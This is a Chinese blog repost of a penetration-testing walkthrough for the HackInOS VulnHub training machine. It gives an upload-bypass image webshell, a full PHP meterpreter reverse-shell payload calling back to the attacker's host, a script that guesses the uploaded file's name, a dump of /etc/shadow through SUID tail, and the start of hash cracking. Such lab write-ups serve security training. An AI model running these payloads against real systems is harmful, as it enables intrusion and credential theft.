<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/blog.github.io/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/blog.github.io/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/blog.github.io/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/blog.github.io/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/blog.github.io/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/blog.github.io/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/blog.github.io/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="部署," />










<meta name="description" content="渗透思路HackInOS来自： https:&#x2F;&#x2F;bbs.pediy.com&#x2F;thread-252599.htm">
<meta property="og:type" content="article">
<meta property="og:title" content="渗透思路HackInOS">
<meta property="og:url" content="https://github.com/magic-2020/blog.github.io/2020/04/14/%E7%8E%AF%E5%A2%83-%E6%B8%97%E9%80%8F%E6%80%9D%E8%B7%AFHackInOS/index.html">
<meta property="og:site_name" content="Magic">
<meta property="og:description" content="渗透思路HackInOS来自： https:&#x2F;&#x2F;bbs.pediy.com&#x2F;thread-252599.htm">
<meta property="og:locale">
<meta property="og:image" content="https://github.com/blog.github.io/images/818602_UV22EB2MF76SZ48.png">
<meta property="og:image" content="https://github.com/blog.github.io/images/818602_SQJK8T83VP53HP9.png">
<meta property="og:image" content="https://github.com/blog.github.io/images/818602_ZE9KRDY6J2Q7NY5.png">
<meta property="og:image" content="https://github.com/blog.github.io/images/818602_WTZ4NMUU6G2CP6Z.png">
<meta property="og:image" content="https://github.com/blog.github.io/images/818602_PSD29T2Z29J3TXN.png">
<meta property="og:image" content="https://github.com/blog.github.io/images/818602_TZCTQVZR4AUY82Q.png">
<meta property="og:image" content="https://github.com/blog.github.io/images/818602_GAQ3TURHMVPA2KB.png">
<meta property="og:image" content="https://github.com/blog.github.io/images/818602_6Q99PGQ99APHXZ5.png">
<meta property="og:image" content="https://github.com/blog.github.io/images/818602_DUD3N4UGT8UWPK3.png">
<meta property="og:image" content="https://github.com/blog.github.io/images/818602_AENTPTZY5EY5R64.png">
<meta property="og:image" content="https://github.com/blog.github.io/images/818602_NQF3TADYEZBV9W9.png">
<meta property="og:image" content="https://github.com/blog.github.io/images/818602_GFGWBKCNDU8JZEH.png">
<meta property="og:image" content="https://github.com/blog.github.io/images/818602_2QF62MW9W7659XG.png">
<meta property="og:image" content="https://github.com/blog.github.io/images/818602_APP4J4WFDRXJ39Y.png">
<meta property="og:image" content="https://github.com/blog.github.io/images/818602_Y3D2DAYVX29YT82.png">
<meta property="og:image" content="https://github.com/blog.github.io/images/818602_G78B4JY8YZ7J62T.png">
<meta property="og:image" content="https://github.com/blog.github.io/images/818602_MCW3EXHE98THGFB.png">
<meta property="og:image" content="https://github.com/blog.github.io/images/818602_E4QQPF2ZCAUU27Y.png">
<meta property="og:image" content="https://github.com/blog.github.io/images/818602_7R2C4QTNKTCMFF7.png">
<meta property="article:published_time" content="2020-04-14T13:11:55.000Z">
<meta property="article:modified_time" content="2022-08-04T02:51:31.450Z">
<meta property="article:author" content="magic">
<meta property="article:tag" content="部署">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://github.com/blog.github.io/images/818602_UV22EB2MF76SZ48.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://github.com/magic-2020/blog.github.io/2020/04/14/环境-渗透思路HackInOS/"/>





  <title>渗透思路HackInOS | Magic</title>
  








<meta name="generator" content="Hexo 5.4.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/blog.github.io/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Magic</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">try everyday</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/blog.github.io/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/blog.github.io/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/blog.github.io/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/blog.github.io/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/blog.github.io/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://github.com/magic-2020/blog.github.io/blog.github.io/2020/04/14/%E7%8E%AF%E5%A2%83-%E6%B8%97%E9%80%8F%E6%80%9D%E8%B7%AFHackInOS/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/blog.github.io/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Magic">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">渗透思路HackInOS</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-04-14T21:11:55+08:00">
                2020-04-14
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/blog.github.io/categories/%E5%AE%89%E5%85%A8/" itemprop="url" rel="index">
                    <span itemprop="name">安全</span>
                  </a>
                </span>

                
                
                  ， 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/blog.github.io/categories/%E5%AE%89%E5%85%A8/%E7%8E%AF%E5%A2%83/" itemprop="url" rel="index">
                    <span itemprop="name">环境</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="渗透思路HackInOS"><a href="#渗透思路HackInOS" class="headerlink" title="渗透思路HackInOS"></a>渗透思路HackInOS</h1><p>来自： <a target="_blank" rel="noopener" href="https://bbs.pediy.com/thread-252599.htm">https://bbs.pediy.com/thread-252599.htm</a></p>
<span id="more"></span>

<h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>HackinOS是一个渗透靶机，模拟真实的渗透环境，方便我们练习渗透方法，靶机下载<a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/hackinos-1,295/#download">地址</a>…<br>攻击者：kali<br>受害者：HackInOS</p>
<h2 id="渗透步骤"><a href="#渗透步骤" class="headerlink" title="渗透步骤"></a>渗透步骤</h2><h3 id="1-获取目标机器ip"><a href="#1-获取目标机器ip" class="headerlink" title="1.获取目标机器ip"></a>1.获取目标机器ip</h3><p>因为我的靶机在虚拟机中网络用的NAT模式，所以靶机IP肯定和kali在同一个网络下，先利用nmap来扫描一波：<br><img src="/blog.github.io/images/818602_UV22EB2MF76SZ48.png" alt="818602_UV22EB2MF76SZ48"><br><img src="/blog.github.io/images/818602_SQJK8T83VP53HP9.png" alt="818602_SQJK8T83VP53HP9"><br>很明显，我们找到了目标机器的ip：192.168.88.133，并且发现开启了22和8000端口，在8000端口下面是一个http服务，而且有一个upload.php文件，猜测这里有一个上传文件漏洞….</p>
<h3 id="2-利用文件上传漏洞"><a href="#2-利用文件上传漏洞" class="headerlink" title="2.利用文件上传漏洞"></a>2.利用文件上传漏洞</h3><p>访问这个地址，确实发现有文件上传的功能：<br><img src="/blog.github.io/images/818602_ZE9KRDY6J2Q7NY5.png" alt="818602_ZE9KRDY6J2Q7NY5"><br>然后我们右键查看源码，发现了一个hint：<br><img src="/blog.github.io/images/818602_WTZ4NMUU6G2CP6Z.png" alt="818602_WTZ4NMUU6G2CP6Z"><br>给了我们一个guthub的<a href="https://github.com/fatihhcelik/Vulnerable-Machine---Hint">连接</a>，我们访问发现：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line"> </span><br><span class="line">&lt;body&gt;</span><br><span class="line"> </span><br><span class="line">&lt;div align=&quot;center&quot;&gt;</span><br><span class="line">&lt;form action=&quot;&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;&gt;</span><br><span class="line">    &lt;br&gt;</span><br><span class="line">    &lt;b&gt;Select image : &lt;/b&gt;</span><br><span class="line">    &lt;input type=&quot;file&quot; name=&quot;file&quot; id=&quot;file&quot; style=&quot;border: solid;&quot;&gt;</span><br><span class="line">    &lt;input type=&quot;submit&quot; value=&quot;Submit&quot; name=&quot;submit&quot;&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;/div&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">// Check if image file is a actual image or fake image</span><br><span class="line">if(isset($_POST[&quot;submit&quot;])) &#123;</span><br><span class="line">    $rand_number = rand(1,100);</span><br><span class="line">    $target_dir = &quot;uploads/&quot;;</span><br><span class="line">    $target_file = $target_dir . md5(basename($_FILES[&quot;file&quot;][&quot;name&quot;].$rand_number));</span><br><span class="line">    $file_name = $target_dir . basename($_FILES[&quot;file&quot;][&quot;name&quot;]);</span><br><span class="line">    $uploadOk = 1;</span><br><span class="line">    $imageFileType = strtolower(pathinfo($file_name,PATHINFO_EXTENSION));</span><br><span class="line">    $type = $_FILES[&quot;file&quot;][&quot;type&quot;];</span><br><span class="line">    $check = getimagesize($_FILES[&quot;file&quot;][&quot;tmp_name&quot;]);</span><br><span class="line">    if($check[&quot;mime&quot;] == &quot;image/png&quot; || $check[&quot;mime&quot;] == &quot;image/gif&quot;)&#123;</span><br><span class="line">        $uploadOk = 1;</span><br><span class="line">    &#125;else&#123;</span><br><span class="line">        $uploadOk = 0;</span><br><span class="line">        echo &quot;:)&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">  if($uploadOk == 1)&#123;</span><br><span class="line">      move_uploaded_file($_FILES[&quot;file&quot;][&quot;tmp_name&quot;], $target_file.&quot;.&quot;.$imageFileType);</span><br><span class="line">      echo &quot;File uploaded /uploads/?&quot;;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line"> </span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p>给了我们上传文件的源码，通过审查我们发现，只允许上传PNG或GIF格式的图片，校验方式是校验文件内容（实际校验的是文件开头几个标志文件类型的字节，PNG格式为0x890x500x4E0x470x0D0x0A0x1A0x0A，GIF格式为GIF98)，没有校验文件后缀;然后通过校验的文件会保存在uploads目录中，但是文件名是一个随机生成的md5值，而后缀保持上传文件的后缀不变….<br>所以我们可以先做一个图片马，主要是反弹shell的马,我们利用Metasploit来生成：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.88.130 lport=4444 -f raw</span><br></pre></td></tr></table></figure>

<p><img src="/blog.github.io/images/818602_PSD29T2Z29J3TXN.png" alt="818602_PSD29T2Z29J3TXN"><br>把生成的payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/*&lt;?php /**/ error_reporting(0); $ip = &#x27;192.168.88.130&#x27;; $port = 4444; if (($f = &#x27;stream_socket_client&#x27;) &amp;&amp; is_callable($f)) &#123; $s = $f(&quot;tcp://&#123;$ip&#125;:&#123;$port&#125;&quot;); $s_type = &#x27;stream&#x27;; &#125; if (!$s &amp;&amp; ($f = &#x27;fsockopen&#x27;) &amp;&amp; is_callable($f)) &#123; $s = $f($ip, $port); $s_type = &#x27;stream&#x27;; &#125; if (!$s &amp;&amp; ($f = &#x27;socket_create&#x27;) &amp;&amp; is_callable($f)) &#123; $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) &#123; die(); &#125; $s_type = &#x27;socket&#x27;; &#125; if (!$s_type) &#123; die(&#x27;no socket funcs&#x27;); &#125; if (!$s) &#123; die(&#x27;no socket&#x27;); &#125; switch ($s_type) &#123; case &#x27;stream&#x27;: $len = fread($s, 4); break; case &#x27;socket&#x27;: $len = socket_read($s, 4); break; &#125; if (!$len) &#123; die(); &#125; $a = unpack(&quot;Nlen&quot;, $len); $len = $a[&#x27;len&#x27;]; $b = &#x27;&#x27;; while (strlen($b) &lt; $len) &#123; switch ($s_type) &#123; case &#x27;stream&#x27;: $b .= fread($s, $len-strlen($b)); break; case &#x27;socket&#x27;: $b .= socket_read($s, $len-strlen($b)); break; &#125; &#125; $GLOBALS[&#x27;msgsock&#x27;] = $s; $GLOBALS[&#x27;msgsock_type&#x27;] = $s_type; if (extension_loaded(&#x27;suhosin&#x27;) &amp;&amp; ini_get(&#x27;suhosin.executor.disable_eval&#x27;)) &#123; $suhosin_bypass=create_function(&#x27;&#x27;, $b); $suhosin_bypass(); &#125; else &#123; eval($b); &#125; die();</span><br></pre></td></tr></table></figure>

<p>保存在hack.php中，然后随便找一个png图片，将hack.php添加到图片中去,然后将png图片后缀改为php：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cat hack.php &gt;&gt; best.png</span><br><span class="line">mv best.png sir.php</span><br></pre></td></tr></table></figure>

<p>然后我们可以写一个python脚本来帮助我们找到并访问我们上传的木马：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">import hashlib</span><br><span class="line">import requests</span><br><span class="line">for i in range(101):</span><br><span class="line">    file_name = hashlib.md5(&#x27;sir.php&#x27;+str(i)).hexdigest()</span><br><span class="line">    r = requests.get(&#x27;http://192.168.88.133:8000/uploads/&#123;&#125;.php&#x27;.format(file_name))</span><br></pre></td></tr></table></figure>

<p>然后我们设置好我们的msfconsole，等待反弹shell的连接：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use exploit/multi/handler</span><br><span class="line">msf5 exploit(multi/handler) &gt; set payload php/meterpreter/reverse_tcp</span><br><span class="line">payload =&gt; php/meterpreter/reverse_tcp</span><br><span class="line">msf5 exploit(multi/handler) &gt; set lhost 192.168.88.130</span><br><span class="line">lhost =&gt; 192.168.88.130</span><br><span class="line">msf5 exploit(multi/handler) &gt; exploit</span><br></pre></td></tr></table></figure>

<p><img src="/blog.github.io/images/818602_TZCTQVZR4AUY82Q.png" alt="818602_TZCTQVZR4AUY82Q"><br>然后我们就可以去网站上去上传木马，然后运行python脚本，然后看到我们已经获得了一个shell：<br><img src="/blog.github.io/images/818602_GAQ3TURHMVPA2KB.png" alt="818602_GAQ3TURHMVPA2KB"><br>但是我们的权限很低…..</p>
<h3 id="提权1"><a href="#提权1" class="headerlink" title="提权1"></a>提权1</h3><p>我们在Web目录中找到Wordpress的配置文件wp-config.php，看到了数据库连接信息：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">/**</span><br><span class="line"> * The base configuration for WordPress</span><br><span class="line"> *</span><br><span class="line"> * The wp-config.php creation script uses this file during the</span><br><span class="line"> * installation. You don&#x27;t have to use the web site, you can</span><br><span class="line"> * copy this file to &quot;wp-config.php&quot; and fill in the values.</span><br><span class="line"> *</span><br><span class="line"> * This file contains the following configurations:</span><br><span class="line"> *</span><br><span class="line"> * * MySQL settings</span><br><span class="line"> * * Secret keys</span><br><span class="line"> * * Database table prefix</span><br><span class="line"> * * ABSPATH</span><br><span class="line"> *</span><br><span class="line"> * @link https://codex.wordpress.org/Editing_wp-config.php</span><br><span class="line"> *</span><br><span class="line"> * @package WordPress</span><br><span class="line"> */</span><br><span class="line"> </span><br><span class="line">// ** MySQL settings - You can get this info from your web host ** //</span><br><span class="line">/** The name of the database for WordPress */</span><br><span class="line">define(&#x27;DB_NAME&#x27;, &#x27;wordpress&#x27;);</span><br><span class="line"> </span><br><span class="line">/** MySQL database username */</span><br><span class="line">define(&#x27;DB_USER&#x27;, &#x27;wordpress&#x27;);</span><br><span class="line"> </span><br><span class="line">/** MySQL database password */</span><br><span class="line">define(&#x27;DB_PASSWORD&#x27;, &#x27;wordpress&#x27;);</span><br><span class="line"> </span><br><span class="line">/** MySQL hostname */</span><br><span class="line">define(&#x27;DB_HOST&#x27;, &#x27;db:3306&#x27;);</span><br><span class="line"> </span><br><span class="line">/** Database Charset to use in creating database tables. */</span><br><span class="line">define(&#x27;DB_CHARSET&#x27;, &#x27;utf8&#x27;);</span><br><span class="line"> </span><br><span class="line">/** The Database Collate type. Don&#x27;t change this if in doubt. */</span><br><span class="line">define(&#x27;DB_COLLATE&#x27;, &#x27;&#x27;);</span><br><span class="line"> </span><br><span class="line">/**#@+</span><br><span class="line"> * Authentication Unique Keys and Salts.</span><br><span class="line"> *</span><br><span class="line"> * Change these to different unique phrases!</span><br><span class="line"> * You can generate these using the &#123;@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service&#125;</span><br><span class="line"> * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.</span><br><span class="line"> *</span><br><span class="line"> * @since 2.6.0</span><br><span class="line"> */</span><br><span class="line">define(&#x27;AUTH_KEY&#x27;,         &#x27;b68c5e8cad4c8f8367efe2db89d7865e894d037d&#x27;);</span><br><span class="line">define(&#x27;SECURE_AUTH_KEY&#x27;,  &#x27;a7b32014b1898077ebe554d7284482aebeac92ae&#x27;);</span><br><span class="line">define(&#x27;LOGGED_IN_KEY&#x27;,    &#x27;e8b6f6b9b86e78127b8bfce51ed90151335d0140&#x27;);</span><br><span class="line">define(&#x27;NONCE_KEY&#x27;,        &#x27;39f17a336c6000ca5d7929be883be09131dc31e1&#x27;);</span><br><span class="line">define(&#x27;AUTH_SALT&#x27;,        &#x27;dbf7b92510a931b835a8b82eec8fd1adbaad487f&#x27;);</span><br><span class="line">define(&#x27;SECURE_AUTH_SALT&#x27;, &#x27;632f4f59a75363a72b7b526d8b69718fc89a5c07&#x27;);</span><br><span class="line">define(&#x27;LOGGED_IN_SALT&#x27;,   &#x27;614056ec3ba0011dcdb83422b44238045627750e&#x27;);</span><br><span class="line">define(&#x27;NONCE_SALT&#x27;,       &#x27;48e539381259ccc664202943d14359572f23638b&#x27;);</span><br><span class="line"> </span><br><span class="line">/**#@-*/</span><br><span class="line"> </span><br><span class="line">/**</span><br><span class="line"> * WordPress Database Table prefix.</span><br><span class="line"> *</span><br><span class="line"> * You can have multiple installations in one database if you give each</span><br><span class="line"> * a unique prefix. Only numbers, letters, and underscores please!</span><br><span class="line"> */</span><br><span class="line">$table_prefix  = &#x27;wp_&#x27;;</span><br><span class="line"> </span><br><span class="line">/**</span><br><span class="line"> * For developers: WordPress debugging mode.</span><br><span class="line"> *</span><br><span class="line"> * Change this to true to enable the display of notices during development.</span><br><span class="line"> * It is strongly recommended that plugin and theme developers use WP_DEBUG</span><br><span class="line"> * in their development environments.</span><br><span class="line"> *</span><br><span class="line"> * For information on other constants that can be used for debugging,</span><br><span class="line"> * visit the Codex.</span><br><span class="line"> *</span><br><span class="line"> * @link https://codex.wordpress.org/Debugging_in_WordPress</span><br><span class="line"> */</span><br><span class="line">define(&#x27;WP_DEBUG&#x27;, false);</span><br><span class="line"> </span><br><span class="line">// If we&#x27;re behind a proxy server and using HTTPS, we need to alert Wordpress of that fact</span><br><span class="line">// see also http://codex.wordpress.org/Administration_Over_SSL#Using_a_Reverse_Proxy</span><br><span class="line">if (isset($_SERVER[&#x27;HTTP_X_FORWARDED_PROTO&#x27;]) &amp;&amp; $_SERVER[&#x27;HTTP_X_FORWARDED_PROTO&#x27;] === &#x27;https&#x27;) &#123;</span><br><span class="line">    $_SERVER[&#x27;HTTPS&#x27;] = &#x27;on&#x27;;</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">/* That&#x27;s all, stop editing! Happy blogging. */</span><br><span class="line"> </span><br><span class="line">/** Absolute path to the WordPress directory. */</span><br><span class="line">if ( !defined(&#x27;ABSPATH&#x27;) )</span><br><span class="line">    define(&#x27;ABSPATH&#x27;, dirname(__FILE__) . &#x27;/&#x27;);</span><br><span class="line"> </span><br><span class="line">/** Sets up WordPress vars and included files. */</span><br><span class="line">require_once(ABSPATH . &#x27;wp-settings.php&#x27;);</span><br></pre></td></tr></table></figure>

<p>然后我们上传一个Linux提权信息收集脚本linuxprivchecker.py：<br><img src="/blog.github.io/images/818602_6Q99PGQ99APHXZ5.png" alt="818602_6Q99PGQ99APHXZ5"><br>然后运行这个脚本：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; chmod 744 /tmp/linuxprivchecker.py</span><br><span class="line">meterpreter &gt; shell</span><br><span class="line">Process 141 created.</span><br><span class="line">Channel 10 created.</span><br><span class="line">python /tmp/linuxprivchecker.py</span><br></pre></td></tr></table></figure>

<p><img src="/blog.github.io/images/818602_DUD3N4UGT8UWPK3.png" alt="818602_DUD3N4UGT8UWPK3"><br>仔细阅读脚本输出的内容，我们发现到tail被设置了SUID：<br><img src="/blog.github.io/images/818602_AENTPTZY5EY5R64.png" alt="818602_AENTPTZY5EY5R64"><br>直接用tail读取shadow文件：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; shell</span><br><span class="line">Process 344 created.</span><br><span class="line">Channel 3 created.</span><br><span class="line">tail -c1G /etc/shadow</span><br><span class="line">root:$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:17951:0:99999:7:::</span><br><span class="line">daemon:*:17931:0:99999:7:::</span><br><span class="line">bin:*:17931:0:99999:7:::</span><br><span class="line">sys:*:17931:0:99999:7:::</span><br><span class="line">sync:*:17931:0:99999:7:::</span><br><span class="line">games:*:17931:0:99999:7:::</span><br><span class="line">man:*:17931:0:99999:7:::</span><br><span class="line">lp:*:17931:0:99999:7:::</span><br><span class="line">mail:*:17931:0:99999:7:::</span><br><span class="line">news:*:17931:0:99999:7:::</span><br><span class="line">uucp:*:17931:0:99999:7:::</span><br><span class="line">proxy:*:17931:0:99999:7:::</span><br><span class="line">www-data:*:17931:0:99999:7:::</span><br><span class="line">backup:*:17931:0:99999:7:::</span><br><span class="line">list:*:17931:0:99999:7:::</span><br><span class="line">irc:*:17931:0:99999:7:::</span><br><span class="line">gnats:*:17931:0:99999:7:::</span><br><span class="line">nobody:*:17931:0:99999:7:::</span><br><span class="line">_apt:*:17931:0:99999:7:::</span><br></pre></td></tr></table></figure>

<p><img src="/blog.github.io/images/818602_NQF3TADYEZBV9W9.png" alt="818602_NQF3TADYEZBV9W9"><br>这里得到了root用户密码的hash值，我们先把hash值保存到文件root.hash中，然后利用hashcat破解它：</p>
